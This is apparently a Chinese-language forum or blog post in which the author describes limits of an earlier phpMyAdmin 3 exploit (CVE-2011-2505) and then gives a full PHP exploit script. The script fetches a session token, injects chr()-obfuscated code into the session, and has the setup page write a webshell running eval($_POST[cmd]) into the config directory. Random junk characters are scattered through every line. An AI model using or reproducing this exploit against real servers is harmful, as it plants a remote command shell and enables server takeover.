最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。- w! S( O9 D! f O
5 E: Z; C6 I8 v, i7 k% h
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。2 X3 t' a6 ]$ p. |0 M0 w
# `, |! h* H0 k, p! ^
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
, l+ e2 t& h: G! `0 _一是session.auto_start = 1;
1 d3 o: I3 Z( J. C- z N7 z4 M二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。/ I: o. L! L1 O$ Y
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
* h! S& M+ E9 _; Y$ @1 L$ v" ~5 _: e3 q# L% i9 t
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
0 x0 i2 S1 n" z* R0 R8 z3 o& J z4 P, e" o3 u- x- y
于是写了这个php版本的exp,代码如下:! p, l. u% H4 O- \6 H( T& ^* N0 q
8 C @) V: T* B; K5 ^
#!/usr/bin/php
9 q& x% ]+ M+ o6 r% I% Z' s9 L<?php/ f8 d2 V) h8 r8 w, M! u
print_r('
; X4 w/ q! ^" B6 f1 V5 Y+---------------------------------------------------------------------------+4 {8 \ t+ N' p( m7 n
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]2 h+ s9 C! y! d7 {
by oldjun(www.oldjun.com)
; V+ O1 |& W5 d1 F- a1 J3 i9 H0 c' Nwelcome to www.t00ls.net) _8 X/ ]7 S5 n7 Q" K& q
mail: oldjun@gmail.com* t3 \1 I$ A8 r) |# C: m. f
Assigned CVE id: CVE-2011-2505
9 \; ?; P5 s S; ?0 l' b+---------------------------------------------------------------------------+ `( l9 |2 A/ Q# m+ t' P
');- o6 h. Z4 B/ x/ s* I/ F
+ S( D0 { s2 L2 ^. v4 |/**
" A) X0 X# W( }' }( S% I& V * working when the directory:"config" exists and is writeable.
/ s% e- L9 ^3 M, k4 h7 E* P8 {9 K**/
3 E3 s5 o/ d( ~4 K y9 J7 ~4 X4 y+ ~- t
if ($argc < 3) {
8 O0 H* a- U% ?+ W print_r('
* C3 x1 h' A* g: ~: A8 Z) m+---------------------------------------------------------------------------+
8 [2 ~: K5 W: O& t6 |- [Usage: php '.$argv[0].' host path
: K. ]$ m* C3 G1 Thost: target server (ip/hostname)0 g8 d/ W H& T O
path: path to pma3
: U4 V) ~1 N( J+ K a) w3 V9 ?Example:
) \6 Q9 m; T5 Z7 M0 d- fphp '.$argv[0].' localhost /pma/
- `1 Z0 H( ]; D& W5 y- q4 S% W6 G3 L+---------------------------------------------------------------------------+
$ B' J6 H" A$ ^. y( G');
. G6 h \$ n$ X/ E: C9 C( L exit;9 E% Z- Z/ H0 r7 h
}
/ e+ Z# p3 y B0 C
r* S. h# w0 K; Y$ L5 s$host = $argv[1];& X h$ b+ j- L) E0 \$ J) {2 O$ E
$path = $argv[2];
, H$ n4 T# \3 \; ?1 i4 J0 s- X* B+ i/ p1 a) q
/**9 `6 c' @% c. |, N
* Try to determine if the directory:"config" exists8 t6 F2 i4 _1 a' Z: \* l9 N5 Z7 t
**/4 i- u2 D( R8 g9 I) U$ Q
echo "[+] Try to determine if the directory:config exists....\n";+ U i+ P% D0 ~/ e# J; x
$returnstr=php_request('config/');
8 ?& Q. P! D' z& ?2 B2 ` _- Qif(strpos($returnstr,'404')){
$ g+ ?* ^+ R/ g; B1 @ exit("[-] Exploit Failed! The directory:config do not exists!\n");
$ e& i2 o5 ?6 s1 z) v9 J}
+ t8 [$ H- @' j# n+ z! C8 z) n5 v' S' U& X$ [& y% L' F& L" v
/**1 m9 R: D# d5 I: W( J5 h; U6 o/ G
* Try to get token and sessionid& t( y `8 p! q" U* x& F
**/
6 Z" P8 c) ?) {$ [echo "[+] Try to get token and sessionid....\n";
0 J6 V& c: t0 ^ S$ `; s0 t( V$result=php_request('index.php');
9 T% @! B% Q' P( Y3 t0 cpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);# E9 W) ]8 D1 C4 k
$token=$resp[3];1 E$ k; Z, _0 z
$sessionid=$resp[1];
( w v! D( F2 l' y+ H& |if($token && $sessionid){0 j, i; Y9 X7 @$ x- y! |3 H
echo "[+] token token\n";/ I9 A+ \ p' s( P/ P: x# H) M# f
echo "[+] Session ID sessionid\n";
4 A7 \* G9 v ^! w}else{3 z* v( X9 |% D& e0 w3 e5 H0 _$ P
exit("[-] Can't get token and Session ID,Exploit Failed!\n");: C' f6 t4 h y0 U
}: M, D- s$ n( C0 c
" b5 _- n" H# F% {/**. |, F7 u5 B x/ c) |5 k' G
* Try to insert shell into session
R6 E" p- _3 k1 B**/
2 m' }, ?# ^ [; ?echo "[+] Try to insert shell into session....\n";
( ?) N: y& c5 D! ?+ y ^php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.* o9 a' P# z/ h# P* k: t
. b; m+ P2 K( g, L( S; o' w4 ~0 v/**$ v+ \ P% }/ W- K
* Try to create webshell+ F0 X- a! Y1 b. _# Z
**/
8 Q5 ^- \+ g6 t. H( n0 cecho "[+] Try to create webshell....\n";
. U; T1 P" t# T' `: Dphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);, v! `% W2 N7 |
/**/ F! ?' X- {- u, l5 I) l
* Try to check if the webshell was created successfully
) p5 b$ \& @. s M; u) q+ n( {% ^**/! r& R3 K, m) [
echo "[+] Try to check if the webshell was created successfully....\n";
4 }* l' r$ j: |2 G$ V$content=php_request('config/config.inc.php');9 x# F5 k h7 G( }: K& N# Q8 z/ t
if(strpos($content,'t00ls')){% G: t. J# V/ T2 C. u3 \6 U
echo "[+] Congratulations! Expoilt successfully....\n";
( A+ w/ W4 H0 i& r% M echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";$ ^/ N. j2 ~$ C5 W" ^# ^
}else{0 B( w3 C! Q3 y+ s8 E' Q& f' ?
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");0 ~, O# F$ G! j3 ?2 I8 P
}5 L5 e3 p. o+ o! X" \
3 n0 w1 K8 e( F; }/ |# ]
function php_request($url,$data='',$cookie=''){) r8 n/ B; g w" ]) E% v/ |1 v. d7 z' b
global $host, $path;
3 L/ R# D6 t' }) d8 w
$ y5 \; Y' x( R $method=$data?'POST':'GET';* V- A) u7 a! u2 h: b' V# C# u% K
: M) V, K6 Y# T8 M; e
$packet = $method." ".$path.$url." HTTP/1.1\r\n";3 _+ m( a: f% S9 |* N f
$packet .= "Accept: */*\r\n";
2 f0 s# n+ a6 P9 E6 i6 K" [ $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";% C% q* P5 G$ w& }! Z% X8 C
$packet .= "Host: $host\r\n";
" z# O- |( ]9 w7 |+ d $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
- `/ D/ b8 K) F( C7 T8 ] w1 q $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
, C$ r0 J# b5 I( \# v7 _ $packet .= $cookie?"Cookie: $cookie\r\n":"";+ S* R/ Y! g) a8 E' M" W
$packet .= "Connection: Close\r\n\r\n";
5 {# w3 n2 @: e% h: e $packet .= $data?$data:"";! y' E. D3 }7 Q! E" c( g
6 C4 G$ W7 M8 y: q
$fp = fsockopen(gethostbyname($host), 80);
4 Y% `$ H: X- n' q/ V7 J, y if (!$fp) {
& Y* P7 D6 G6 w$ P; d, b echo 'No response from '.$host; die;
% P% z% b1 w# S# K7 i4 l8 ^( g5 j }
+ R2 R' X, g1 N4 @ fputs($fp, $packet);( R( t; ^$ Z9 R
+ T' z }* I6 I, J8 M& A% ~
$resp = '';3 R! b X8 ^& D) {* X
5 f( z3 A' T1 g% p x! b while ($fp && !feof($fp))
% E% U/ m) Q7 S $resp .= fread($fp, 1024);# N# _5 I; [ D. X
% q5 H# ~0 K) Q0 t6 \) k return $resp;
4 Q) A, O1 g, |. Y: i9 ^}
: [/ s6 D9 w4 }2 t2 c5 d# Q6 A 8 ^1 ^1 x b- m! h: q# |9 ?5 J4 t
?>
' s) A0 @8 ]& j* `5 o. |